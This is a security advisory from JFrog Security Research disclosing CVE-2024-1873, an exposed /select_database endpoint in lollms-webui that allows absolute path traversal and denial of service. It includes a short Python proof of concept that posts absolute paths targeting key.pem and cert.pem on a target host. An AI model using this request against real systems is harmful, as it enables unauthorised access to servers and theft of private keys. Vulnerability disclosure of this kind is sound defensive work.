JFrog Security Research
< Back

JFSA-2024-001028816 - lollms-webui exposed endpoints DoS

CVE-2024-1873 | CVSS 8.2

JFrog Severity:high

Discovered ByNaveh Racovskyof the JFrog Security Research Team

Published 16 Apr, 2024 | Last updated 16 Apr, 2024

Exposed endpoints in lollms-webui leads to denial of service

parisneo/lollms-webui

(,)

The /select_database endpoint is always open, even when the program is exposed to the network. This can have several implications. While at first look the endpoint does implement a basic path traversal protection, by looking for ".." in the filename, it does not prevent absolute path traversal;

// PoC.py
import requests

IP_ADDRESS = "aaa.bbb.ccc.ddd"
PORT = 9600

for file_name in ["key.pem", "cert.pem"]:
    data = {
        "name": f"/home/user/personal_data/certs/{file_name}",
    }
    response = requests.post(f"http://{IP_ADDRESS}:{str(PORT)}/select_database", json=data)
    print(response.json())

No mitigations are supplied for this issue

Advisory

< Back